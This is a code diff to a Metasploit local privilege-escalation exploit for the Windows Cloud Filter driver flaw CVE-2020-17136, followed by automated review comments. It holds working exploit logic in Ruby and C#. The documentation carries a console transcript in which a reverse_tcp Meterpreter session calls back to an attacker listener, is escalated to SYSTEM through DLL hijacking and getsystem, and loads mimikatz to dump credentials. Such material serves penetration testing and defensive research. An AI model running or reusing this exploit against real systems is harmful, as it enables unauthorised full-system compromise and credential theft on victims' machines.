diff --git a/data/exploits/CVE-2020-17136/cloudFilterEOP.exe b/data/exploits/CVE-2020-17136/cloudFilterEOP.exe index e1690507c2..16cb8809c1 100644 Binary files a/data/exploits/CVE-2020-17136/cloudFilterEOP.exe and b/data/exploits/CVE-2020-17136/cloudFilterEOP.exe differ diff --git a/documentation/modules/exploit/windows/local/cve_2020_17136.md b/documentation/modules/exploit/windows/local/cve_2020_17136.md index 5e2011b31a..3833ecd351 100644 --- a/documentation/modules/exploit/windows/local/cve_2020_17136.md +++ b/documentation/modules/exploit/windows/local/cve_2020_17136.md 
@@ -7,21 +7,23 @@ security checks that would otherwise prevent a normal user from being able to cr they don't have permissions to create files in. This module abuses this vulnerability to perform a DLL hijacking attack against the Microsoft Storage -Spaces SMP service, which grants the attacker code execution as the `NETWORK SERVICE` user. The module -then uses RPCSS named pipe impersonation to obtain a `SYSTEM` token and assign it to the current process, -thereby allowing the attacker to execute arbitrary code as the `SYSTEM` user. +Spaces SMP service, which grants the attacker code execution as the `NETWORK SERVICE` user. Users are +strongly encouraged to set the `PAYLOAD` option to one of the Meterpreter payloads, as doing so will +allow them to subsequently escalate their new session from `NETWORK SERVICE` to `SYSTEM` by using +Meterpreter's `getsystem` command to perform RPCSS Named Pipe Impersonation and impersonate +the `SYSTEM` user. ### Installation And Setup `cldflt.sys` should exist by default on all versions of Windows 10 v1803 and later. ## Verification Steps 1. Start msfconsole - 2. Get a meterpreter shell as a low privileged user. + 2. Get a shell as a low privileged user. 3. **Verify** that `getsystem` does not get you a `SYSTEM` shell. 4. `use exploit/windows/local/cve_2020_17136` 5. `set session *session id*` 6. `run` - 7. **Verify** that you get a new shell as the `SYSTEM` user + 7. **Verify** that you get a new shell as the `N` user ## Options @@ -43,7 +45,7 @@ msf6 exploit(multi/handler) > run [*] Started bind TCP handler against 172.22.152.177:4444 [*] Sending stage (200262 bytes) to 172.22.152.177 -[*] Meterpreter session 1 opened (0.0.0.0:0 -> 172.22.152.177:4444) at 2021-01-06 01:26:51 -0600 +[*] Meterpreter session 1 opened (0.0.0.0:0 -> 172.22.152.177:4444) at 2021-01-08 11:17:11 -0600 meterpreter > getuid Server username: DESKTOP-KUO5CML\normal 
@@ -60,14 +62,6 @@ SeShutdownPrivilege SeTimeZonePrivilege SeUndockPrivilege -meterpreter > sysinfo -Computer : DESKTOP-KUO5CML -OS : Windows 10 (10.0 Build 19041). -Architecture : x64 -System Language : en_US -Domain : WORKGROUP -Logged On Users : 5 -Meterpreter : x64/windows meterpreter > getsystem [-] 2001: Operation failed: Access is denied. The following was attempted: [-] Named Pipe Impersonation (In Memory/Admin) @@ -78,16 +72,20 @@ meterpreter > background [*] Backgrounding session 1... msf6 exploit(multi/handler) > use exploit/windows/local/cve_2020_17136 [*] Using configured payload windows/x64/meterpreter/reverse_tcp +msf6 exploit(windows/local/cve_2020_17136) > set SESSION 1 +SESSION => 1 +msf6 exploit(windows/local/cve_2020_17136) > check +[*] The target appears to be vulnerable. A vulnerable Windows 10 20H1 build was detected! msf6 exploit(windows/local/cve_2020_17136) > show options Module options (exploit/windows/local/cve_2020_17136): - Name Current Setting Required Description - ---- --------------- -------- ----------- - AMSIBYPASS true yes Enable Amsi bypass - ETWBYPASS true yes Enable Etw bypass - SESSION yes The session to run this module on. - WAIT 5 no Time in seconds to wait + Name Current Setting Required Description + ---- --------------- -------- ----------- + AMSIBYPASS true yes Enable Amsi bypass + ETWBYPASS true yes Enable Etw bypass + SESSION 1 yes The session to run this module on. + WAIT 5 no Time in seconds to wait Payload options (windows/x64/meterpreter/reverse_tcp): 
@@ -106,36 +104,52 @@ Exploit target: 0 Windows DLL Dropper -msf6 exploit(windows/local/cve_2020_17136) > set SESSION 1 -SESSION => 1 msf6 exploit(windows/local/cve_2020_17136) > set LHOST 172.22.159.28 LHOST => 172.22.159.28 -msf6 exploit(windows/local/cve_2020_17136) > set LPORT 6688 -LPORT => 6688 msf6 exploit(windows/local/cve_2020_17136) > run -[*] Started reverse TCP handler on 172.22.159.28:6688 +[*] Started reverse TCP handler on 172.22.159.28:4444 [*] Executing automatic check (disable AutoCheck to override) [+] The target appears to be vulnerable. A vulnerable Windows 10 20H1 build was detected! -[*] Dropping payload dll at C:\Windows\Temp\WsutUtXDcIsPqEKn.dll and registering it for cleanup... +[*] Dropping payload dll at C:\Windows\Temp\BXNkequQiAvYxuVp.dll and registering it for cleanup... [*] Running module against DESKTOP-KUO5CML [*] Launching notepad.exe to host CLR... -[+] Process 7784 launched. -[*] Reflectively injecting the Host DLL into 7784.. -[*] Injecting Host into 7784... -[*] Host injected. Copy assembly into 7784... +[+] Process 100 launched. +[*] Reflectively injecting the Host DLL into 100.. +[*] Injecting Host into 100... +[*] Host injected. Copy assembly into 100... [*] Assembly copied. [*] Executing... [*] Start reading output -[+] Key: 1821285265184 +[+] Sync connection key: 2733760425760 [+] Done [*] End output. [+] Execution finished. 
[*] Sending stage (200262 bytes) to 172.22.152.177 -[*] Meterpreter session 2 opened (172.22.159.28:6688 -> 172.22.152.177:62867) at 2021-01-06 01:28:26 -0600 -[*] Session ID 2 (172.22.159.28:6688 -> 172.22.152.177:62867) processing AutoRunScript 'post/windows/escalate/getsystem' -[+] Obtained SYSTEM via technique 4 +[*] Meterpreter session 2 opened (172.22.159.28:4444 -> 172.22.152.177:49968) at 2021-01-08 11:18:19 -0600 +meterpreter > getuid +Server username: NT AUTHORITY\NETWORK SERVICE +meterpreter > getprivs + +Enabled Process Privileges +========================== + +Name +---- +SeAssignPrimaryTokenPrivilege +SeAuditPrivilege +SeChangeNotifyPrivilege +SeCreateGlobalPrivilege +SeImpersonatePrivilege +SeIncreaseQuotaPrivilege +SeIncreaseWorkingSetPrivilege +SeShutdownPrivilege +SeTimeZonePrivilege +SeUndockPrivilege + +meterpreter > getsystem +...got system via technique 4 (Named Pipe Impersonation (RPCSS variant)). meterpreter > getuid Server username: NT AUTHORITY\SYSTEM meterpreter > getprivs @@ -157,7 +171,7 @@ SeTimeZonePrivilege SeUndockPrivilege meterpreter > load kiwi -Loading extension kiwi...cre +Loading extension kiwi... .#####. mimikatz 2.2.0 20191125 (x64/windows) .## ^ ##. "A La Vie, A L'Amour" - (oe.eo) ## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com ) @@ -198,8 +212,8 @@ normal DESKTOP-KUO5CML (null) test DESKTOP-KUO5CML (null) -meterpreter > background -[*] Backgrounding session 2... +meterpreter > +Background session 2? [y/N] msf6 exploit(windows/local/cve_2020_17136) > sessions Active sessions 
@@ -208,7 +222,7 @@ Active sessions Id Name Type Information Connection -- ---- ---- ----------- ---------- 1 meterpreter x64/windows DESKTOP-KUO5CML\normal @ DESKTOP-KUO5CML 0.0.0.0:0 -> 172.22.152.177:4444 (172.22.152.177) - 2 meterpreter x64/windows NT AUTHORITY\SYSTEM @ DESKTOP-KUO5CML 172.22.159.28:6688 -> 172.22.152.177:62867 (172.22.152.177) + 2 meterpreter x64/windows NT AUTHORITY\SYSTEM @ DESKTOP-KUO5CML 172.22.159.28:4444 -> 172.22.152.177:49968 (172.22.152.177) msf6 exploit(windows/local/cve_2020_17136) > ``` diff --git a/external/source/exploits/CVE-2020-17136/POC_CloudFilter_ArbitraryFile_EoP/Program.cs b/external/source/exploits/CVE-2020-17136/POC_CloudFilter_ArbitraryFile_EoP/Program.cs index 7de30bd608..ff88ee6350 100644 --- a/external/source/exploits/CVE-2020-17136/POC_CloudFilter_ArbitraryFile_EoP/Program.cs +++ b/external/source/exploits/CVE-2020-17136/POC_CloudFilter_ArbitraryFile_EoP/Program.cs @@ -590,7 +590,7 @@ namespace POC_CloudFilter_ArbitraryFile_EoP CfConnectSyncRoot(SyncRoot, table, IntPtr.Zero, CF_CONNECT_FLAGS.CF_CONNECT_FLAG_NONE, out long key).Check(); try { - Console.WriteLine("Key: {0}", key); + Console.WriteLine("Sync connection key: {0}", key); CF_PLACEHOLDER_CREATE_INFO[] place_holders = new CF_PLACEHOLDER_CREATE_INFO[1]; place_holders[0].RelativeFileName = FilePath; CF_FS_METADATA meta_data = new CF_FS_METADATA diff --git a/modules/exploits/windows/local/cve_2020_17136.rb b/modules/exploits/windows/local/cve_2020_17136.rb index 23aa3f8e05..af86453a7d 100644 --- a/modules/exploits/windows/local/cve_2020_17136.rb +++ b/modules/exploits/windows/local/cve_2020_17136.rb @@ -11,6 +11,7 @@ class MetasploitModule < Msf::Exploit::Local include Msf::Post::Windows::ReflectiveDLLInjection include Msf::Post::Windows::Dotnet include Msf::Post::Windows::Services + include Msf::Post::Windows::FileSystem include Msf::Exploit::FileDropper prepend Msf::Exploit::Remote::AutoCheck 
@@ -20,17 +21,20 @@ class MetasploitModule < Msf::Exploit::Local info, 'Name' => 'CVE-2020-1170 Cloud Filter Arbitrary File Creation EOP', 'Description' => %q{ - The Cloud Filter driver, cldflt.sys, on Windows 10 v1803 and later, prior to the December 2020 updates, - did not set the IO_FORCE_ACCESS_CHECK or OBJ_FORCE_ACCESS_CHECK flags when calling - FltCreateFileEx() and FltCreateFileEx2() within its HsmpOpCreatePlaceholders() function with attacker - controlled input. This meant that files were created with KernelMode permissions, thereby bypassing any - security checks that would otherwise prevent a normal user from being able to create files in directories + The Cloud Filter driver, cldflt.sys, on Windows 10 v1803 and later, prior to the December + 2020 updates, did not set the IO_FORCE_ACCESS_CHECK or OBJ_FORCE_ACCESS_CHECK flags when + calling FltCreateFileEx() and FltCreateFileEx2() within its HsmpOpCreatePlaceholders() + function with attacker controlled input. This meant that files were created with + KernelMode permissions, thereby bypassing any security checks that would otherwise + prevent a normal user from being able to create files in directories they don't have permissions to create files in. - This module abuses this vulnerability to perform a DLL hijacking attack against the Microsoft Storage - Spaces SMP service, which grants the attacker code execution as the NETWORK SERVICE user. The module - then uses RPCSS named pipe impersonation to obtain a SYSTEM token and assign it to the current process, - thereby allowing the attacker to execute arbitrary code as the SYSTEM user. + This module abuses this vulnerability to perform a DLL hijacking attack against the + Microsoft Storage Spaces SMP service, which grants the attacker code execution as the + NETWORK SERVICE user. 
Users are strongly encouraged to set the PAYLOAD option to one + of the Meterpreter payloads, as doing so will allow them to subsequently escalate their + new session from NETWORK SERVICE to SYSTEM by using Meterpreter's "getsystem" command + to perform RPCSS Named Pipe Impersonation and impersonate the SYSTEM user. }, 'License' => MSF_LICENSE, 'Author' => [ @@ -40,7 +44,7 @@ class MetasploitModule < Msf::Exploit::Local 'Platform' => ['win'], 'SessionTypes' => ['meterpreter'], 'Privileged' => true, - 'Arch' => [ARCH_X86, ARCH_X64], + 'Arch' => [ARCH_X64], 'Targets' => [ [ 'Windows DLL Dropper', { 'Arch' => [ARCH_X64], 'Type' => :windows_dropper } ], @@ -62,7 +66,6 @@ class MetasploitModule < Msf::Exploit::Local { 'EXITFUNC' => 'process', 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp', - 'AUTORUNSCRIPT' => 'post/windows/escalate/getsystem' } ) ) @@ -81,23 +84,6 @@ class MetasploitModule < Msf::Exploit::Local ) end - def find_required_clr(exe_path) - filecontent = File.read(exe_path).bytes - sign = 'v4.0.30319'.bytes - filecontent.each_with_index do |_item, index| - sign.each_with_index do |subitem, indexsub| - break if subitem.to_s(16) != filecontent[index + indexsub].to_s(16) - - if indexsub == 9 - vprint_status('CLR version required: v4.0.30319') - return 'v4.0.30319' - end - end - end - vprint_status('CLR version required: v2.0.50727') - 'v2.0.50727' - end - def check_requirements(clr_req, installed_dotnet_versions) installed_dotnet_versions.each do |fi| if clr_req == 'v4.0.30319' @@ -116,7 +102,6 @@ class MetasploitModule < Msf::Exploit::Local def check sysinfo_value = sysinfo['OS'] - if sysinfo_value !~ /windows/i # Non-Windows systems are definitely not affected. return CheckCode::Safe('Target is not a Windows system, so it is not affected by this vulnerability!') 
@@ -153,23 +138,29 @@ class MetasploitModule < Msf::Exploit::Local def exploit if sysinfo['Architecture'] != 'x64' fail_with(Failure::NoTarget, 'This module currently only supports targeting x64 systems!') + elsif session.arch != 'x64' + fail_with(Failure::NoTarget, 'Sorry, WoW64 is not supported at this time!') end dir_junct_path = 'C:\\Windows\\Temp' intermediate_dir = rand_text_alpha(10).to_s junction_dir = rand_text_alpha(10).to_s + path_to_intermediate_dir = "#{dir_junct_path}\\#{intermediate_dir}" - cd(dir_junct_path) - mkdir(intermediate_dir) - if !directory?("#{dir_junct_path}\\#{intermediate_dir}") + mkdir("#{path_to_intermediate_dir}") + if !directory?("#{path_to_intermediate_dir}") fail_with(Failure::UnexpectedReply, 'Could not create the intermediate directory!') end - register_dir_for_cleanup("#{dir_junct_path}\\#{intermediate_dir}") + register_dir_for_cleanup("#{path_to_intermediate_dir}") - cmd_exec("cmd.exe /C \"mklink /J #{dir_junct_path}\\#{intermediate_dir}\\#{junction_dir} C:\\\"") - if !directory?("#{dir_junct_path}\\#{intermediate_dir}\\#{junction_dir}") - fail_with(Failure::UnexpectedReply, 'Could not create the junction directory!') + mkdir("#{path_to_intermediate_dir}\\#{junction_dir}") + if !directory?("#{path_to_intermediate_dir}\\#{junction_dir}") + fail_with(Failure::UnexpectedReply, 'Could not create the junction directory as a folder!') + end + + mount_handle = create_mount_point("#{path_to_intermediate_dir}\\#{junction_dir}", 'C:\\') + if !directory?("#{path_to_intermediate_dir}\\#{junction_dir}") + fail_with(Failure::UnexpectedReply, 'Could not transform the junction directory into a junction!') end - register_dir_for_cleanup("#{dir_junct_path}\\#{intermediate_dir}\\#{junction_dir}") exe_path = 'data/exploits/CVE-2020-17136/cloudFilterEOP.exe' unless File.file?(exe_path) 
@@ -180,17 +171,18 @@ class MetasploitModule < Msf::Exploit::Local if installed_dotnet_versions == [] fail_with(Failure::BadConfig, 'Target has no .NET framework installed') end - rclr = find_required_clr(exe_path) - if check_requirements(rclr, installed_dotnet_versions) == false + if check_requirements('v4.0.30319', installed_dotnet_versions) == false fail_with(Failure::BadConfig, 'CLR required for assembly not installed') end payload_path = "C:\\Windows\\Temp\\#{rand_text_alpha(16)}.dll" print_status("Dropping payload dll at #{payload_path} and registering it for cleanup...") write_file(payload_path, generate_payload_dll) register_file_for_cleanup(payload_path) - execute_assembly(exe_path, "#{dir_junct_path}\\#{intermediate_dir} #{junction_dir}\\Windows\\System32\\healthapi.dll #{payload_path}") + execute_assembly(exe_path, "#{path_to_intermediate_dir} #{junction_dir}\\Windows\\System32\\healthapi.dll #{payload_path}") service_start('smphost') register_file_for_cleanup('C:\\Windows\\System32\\healthapi.dll') + sleep(3) + delete_mount_point("#{path_to_intermediate_dir}\\#{junction_dir}", mount_handle) end def pid_exists(pid)
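Review bot: in the documentation hunk @@ -7,21 +7,23 @@, verification step 7 now reads `**Verify** that you get a new shell as the `N` user`, which looks like a truncated edit; it should say the `NETWORK SERVICE` user to match the rewritten description and the `Server username: NT AUTHORITY\NETWORK SERVICE` output added later in the same file. Step 3 (`**Verify** that `getsystem` does not get you a `SYSTEM` shell.`) also still presumes a Meterpreter session even though step 2 was relaxed from "Get a meterpreter shell" to `Get a shell as a low privileged user.`; either keep "meterpreter shell" in step 2 or state that step 3 and the later `getsystem` escalation apply only to Meterpreter sessions, which is the case the description now recommends.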
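Review bot: in the documentation hunk @@ -106,36 +104,52 @@, the explicit `meterpreter > background` / `[*] Backgrounding session 2...` lines are replaced by `+meterpreter >` followed by `+Background session 2? [y/N]`, i.e. an interactive Ctrl-Z prompt with no visible answer, so a reader following the transcript cannot reproduce it verbatim; keep the explicit `background` command. The rest of the hunk (LPORT falling back to the default 4444, `getsystem` run from `NT AUTHORITY\NETWORK SERVICE` and reporting `...got system via technique 4 (Named Pipe Impersonation (RPCSS variant)).`) is consistent with the new description and with the removal of the `AUTORUNSCRIPT` default in the module.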
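Review bot: in the module hunk @@ -20,17 +21,20 @@, the unchanged context line `'Name' => 'CVE-2020-1170 Cloud Filter Arbitrary File Creation EOP',` carries a CVE identifier that does not match the module path `modules/exploits/windows/local/cve_2020_17136.rb`, the documentation path, or the `data/exploits/CVE-2020-17136/cloudFilterEOP.exe` binary updated in this same patch; since the hunk already rewraps the description directly under that line, fix the name to CVE-2020-17136 here rather than leaving the mismatch for a later change.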
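Review bot: in the module hunk @@ -81,23 +84,6 @@, dropping `find_required_clr` in favour of a literal `'v4.0.30319'` is reasonable for a bundled binary, but the fact that `cloudFilterEOP.exe` targets the .NET 4 runtime now survives only as a magic string at the later call `check_requirements('v4.0.30319', installed_dotnet_versions)`; add a named constant or a comment there, because the binary itself is also replaced in this patch and nothing would flag a future rebuild against a different CLR. While touching that call, `if check_requirements(...) == false` reads better as `unless check_requirements(...)`, and `check_requirements` still carries its `clr_req == 'v4.0.30319'` branch for a parameter that now only ever takes one value.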
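Review bot: in the module hunk @@ -153,23 +138,29 @@, the guard after `mount_handle = create_mount_point("#{path_to_intermediate_dir}\\#{junction_dir}", 'C:\\')` repeats the same `directory?` test that already passed for the plain folder created by `mkdir` two lines earlier, so a failed reparse-point creation still satisfies it and the `'Could not transform the junction directory into a junction!'` branch is unreachable. Test the result of `create_mount_point` instead (fail if `mount_handle` is nil or indicates failure) and, if a filesystem-level confirmation is wanted, check that the path is now a reparse point rather than merely a directory; the later `execute_assembly` argument `#{junction_dir}\\Windows\\System32\\healthapi.dll` only works if the junction really resolves into `C:\`. Smaller point in the same hunk: `mkdir("#{path_to_intermediate_dir}")`, `directory?("#{path_to_intermediate_dir}")` and `register_dir_for_cleanup("#{path_to_intermediate_dir}")` interpolate a single string variable; pass `path_to_intermediate_dir` directly.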
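Review bot: in the module hunk @@ -180,17 +171,18 @@, `delete_mount_point("#{path_to_intermediate_dir}\\#{junction_dir}", mount_handle)` is only reached on the success path, yet between `create_mount_point` in the previous hunk and this call there are three `fail_with` exits (`unless File.file?(exe_path)`, `'Target has no .NET framework installed'`, `'CLR required for assembly not installed'`) plus anything `execute_assembly` or `service_start('smphost')` may raise. On any of those the junction to `C:\` is left inside `path_to_intermediate_dir`, which the previous hunk registers with `register_dir_for_cleanup`, and the old `register_dir_for_cleanup` for the junction directory was removed without a replacement for the failure case, so the generic directory cleanup is now the only thing that meets a live junction to the system drive. Move the pre-flight checks (exe present, .NET installed, CLR version) above `create_mount_point`, and wrap the span from `create_mount_point` through `service_start` in `begin ... ensure delete_mount_point(...) end` so the reparse point is always removed. Also, `sleep(3)` is a new magic number next to the existing `WAIT` option (`Time in seconds to wait`, default 5); reuse `datastore['WAIT']` or comment why three seconds is enough for smphost to load the dropped DLL before the junction is torn down.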